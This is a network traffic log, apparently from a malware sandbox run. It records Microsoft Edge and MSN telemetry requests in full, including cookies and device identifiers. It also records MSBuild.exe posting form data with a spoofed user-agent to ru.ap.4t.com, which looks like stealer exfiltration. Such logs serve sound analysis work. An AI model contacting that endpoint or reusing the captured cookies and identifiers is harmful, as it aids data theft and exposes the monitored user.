GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=720&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/2.0
host: ntp.msn.com
cache-control: max-age=0
dnt: 1
accept: */*
service-worker: script
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":47,"imageId":"BB1msBhw","provider":"CMSImage","userSelected":false},"bg_img_typ":"imageAndVideo","dsp":1,"en_widget_reg":false,"exp":["msAllowThemeInstallationFromChromeStore","msUndersideAutoOpenForMsnTopQuestion","msNurturingMetadataTemplate","msNurturingOnboardNTPToCE"],"feed_dis":"peek","layout":1,"quick_links_opt":1,"seen_new_dev_fre":false,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"cpt":false,"v":"2"}}
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: serviceworker
referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: pglt-edgeChromium-dhp=2083
cookie: sptmarket=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: USRLOC=
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: MicrosoftApplicationsTelemetryDeviceId=488a5944-4c3f-431a-ac6b-41d1858d4154
cookie: ai_session=lrWGEv3fnryRFDgzVS/otZ|1743211833393|1743211833393
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: sptmarket_restored=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: u=4, i

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-length: 49915
content-type: text/html; charset=utf-8
set-cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: sptmarket_restored=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
set-cookie: USRLOC=; expires=Mon, 29 Mar 2027 01:30:37 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
set-cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8; domain=.msn.com; path=/; httponly
access-control-allow-methods: HEAD,GET,OPTIONS
content-security-policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://petrol.office.microsoft.com/v1/feedback https://privacyportal.onetrust.com/request/v1/consentreceipts https://sapphire.api.microsoftapp.net https://services.bingapis.com https://substrate.office.com/PeoplePredictionsB2/StreamsPreview https://substrate.office.com/PeoplePredictionsB2/StreamsPreviewById https://substrate.office.com/autodiscover/ https://trafficanswer.trafficmanager.net https://*.clarity.ms https://edge.microsoft.com/edgedeeplearning/ img-s-msn-com.akamaized.net img-s.msn.cn login.microsoftonline.com notification.services.msn.com ocws.officeapps.live.com/ocs/ ocws-eu.officeapps.live.com/ocs/ odc.officeapps.live.com/odc/ prod-video-cms-amp-microsoft-com.akamaized.net r.bing.com/rp/rms_pr.png raka.bing.com/rp/rms_pr.png ris.api.iris.microsoft.com srtb.msn.com srtb.msn.cn srtb-pulsar.msn.com substrate.office.com/FocusedInboxB2/api/v1/ substrate.office.com/PeoplePredictionsB2/graphql substrate.office.com/PeoplePredictionsB2/MeTaPreview substrate.office.com/PeoplePredictionsB2/SPImageProxied substrate.office.com/PeoplePredictionsB2/SpPreview substrate.office.com/api/beta/me/WorkingSetFiles substrate.office.com/api/beta/me/officegraphinsights/trending substrate.office.com/recommended/api/beta/edgeworth/ substrate.office.com/api/v2.0/ substrate.office.com/peoplepredictionsb2/feedback substrate.office.com/peoplepredictionsb2/microsoftfeed substrate.office.com/recommended/api/v1.0/files substrate.office.com/search/api/v1/ substrate.office.com/todo/api/v1/ substrate.office.com/todob2/api/v1/ th.bing.com/th webshell.suite.office.com/api/shell/newtab wss://www.bing.com/opaluqu/speech/recognition/interactive/cognitiveservices/ wss://sr.bing.com/opaluqu/speech/recognition/interactive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net *.tc.mm.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-SPfxZl1wFzzD9lK+O9yVUmxrGa9i/yYBxBEre1Lrx4w=' 'strict-dynamic',script-src 'nonce-SPfxZl1wFzzD9lK+O9yVUmxrGa9i/yYBxBEre1Lrx4w=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:
x-robots-tag: noindex
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1
x-ua-compatible: IE=Edge;chrome=1
x-fabric-cluster: pmeprodneu
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
strict-transport-security: max-age=1209600; includeSubDomains; preload
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
x-ceto-ref: 67e74d3d322e4113a4e12c0b874c9db3|AFD:4123C8E26D2E4E65A63D767035F7B01D|2025-03-29T01:30:37.118Z
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: 4123C8E26D2E4E65A63D767035F7B01D Ref B: LON04EDGE1013 Ref C: 2025-03-29T01:30:37Z
date: Sat, 29 Mar 2025 01:30:36 GMT
POST

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835982&w=0&NoResponseBody=true

msedge.exe

Remote address:

51.104.15.253:443

Request

POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835982&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.msn.com
content-length: 14703
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
content-type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: u=4, i

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=d9668fe75cb7428f957612a24b654e32&HASH=d966&LV=202503&V=4&LU=1743211837464; Domain=.microsoft.com; Expires=Sun, 29 Mar 2026 01:30:37 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=4ddf829c1abe417cb72899c2282b03cb; Domain=.microsoft.com; Expires=Sat, 29 Mar 2025 02:00:37 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1482
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: time-delta-millis
date: Sat, 29 Mar 2025 01:30:36 GMT
POST

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835984&w=0&NoResponseBody=true

msedge.exe

Remote address:

51.104.15.253:443

Request

POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211835984&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.msn.com
content-length: 7869
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
content-type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_V=1
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
priority: u=4, i

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=ffd54fdd80fc41f396c2de293698caa2&HASH=ffd5&LV=202503&V=4&LU=1743211837464; Domain=.microsoft.com; Expires=Sun, 29 Mar 2026 01:30:37 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=d22d84de46964b5899963a78d305208f; Domain=.microsoft.com; Expires=Sat, 29 Mar 2025 02:00:37 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1480
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: time-delta-millis
date: Sat, 29 Mar 2025 01:30:36 GMT
POST

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837203&w=0&NoResponseBody=true

msedge.exe

Remote address:

51.104.15.253:443

Request

POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837203&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.msn.com
content-length: 25712
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
content-type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_V=1
cookie: USRLOC=
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: _C_ETH=1
priority: u=4, i

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=d9c3239cf50745b08315bbe164689c54&HASH=d9c3&LV=202503&V=4&LU=1743211838870; Domain=.microsoft.com; Expires=Sun, 29 Mar 2026 01:30:38 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=ff7ad3dd9b1c4405bdca4226d6d11835; Domain=.microsoft.com; Expires=Sat, 29 Mar 2025 02:00:38 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1667
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: time-delta-millis
date: Sat, 29 Mar 2025 01:30:38 GMT
POST

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837962&w=0&NoResponseBody=true

msedge.exe

Remote address:

51.104.15.253:443

Request

POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211837962&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.msn.com
content-length: 7192
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
content-type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_V=1
cookie: USRLOC=
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
cookie: msnup=%7B%22cnex%22%3A%22no%22%7D
cookie: _C_ETH=1
priority: u=4, i

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=4fcbe2df23464bb89108cb411e5b06cf&HASH=4fcb&LV=202503&V=4&LU=1743211839323; Domain=.microsoft.com; Expires=Sun, 29 Mar 2026 01:30:39 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=7daf40fee36042d7bf5fda9d2fcfb694; Domain=.microsoft.com; Expires=Sat, 29 Mar 2025 02:00:39 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1361
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: time-delta-millis
date: Sat, 29 Mar 2025 01:30:38 GMT
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----s00zcjwlfk68qq90zct2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 10957
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=domains_config_gz&version=3.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /entityextractiontemplates/api/v1/assets/find-assets?name=domains_config_gz&version=3.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/2.0
host: edge.microsoft.com
edge-asset-group: EntityExtractionDomainsConfig
sec-mesh-client-edge-version: 133.0.3065.69
sec-mesh-client-edge-channel: stable
sec-mesh-client-os: Windows
sec-mesh-client-os-version: 10.0.19041
sec-mesh-client-arch: x86_64
sec-mesh-client-webview: 0
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: public, max-age=3600
content-length: 266
content-type: application/json; charset=utf-8
x-cache: TCP_HIT
x-frame-options: sameorigin
x-msedge-ref: Ref A: B76E4F8A8F2041C0A72DE76EC5BA94FB Ref B: LON04EDGE1219 Ref C: 2025-03-29T01:30:38Z
date: Sat, 29 Mar 2025 01:30:38 GMT
GET

https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=arbitration_priority_list&version=24.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /entityextractiontemplates/api/v1/assets/find-assets?name=arbitration_priority_list&version=24.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/2.0
host: edge.microsoft.com
edge-asset-group: ArbitrationService
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: public, max-age=3600
content-length: 265
content-type: application/json; charset=utf-8
x-cache: TCP_HIT
x-frame-options: sameorigin
x-msedge-ref: Ref A: 226371D5369F43E8B346E75A634B973A Ref B: LON04EDGE1219 Ref C: 2025-03-29T01:30:38Z
date: Sat, 29 Mar 2025 01:30:38 GMT
GET

https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.11.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.11.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/2.0
host: edge.microsoft.com
edge-asset-group: Shoreline
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
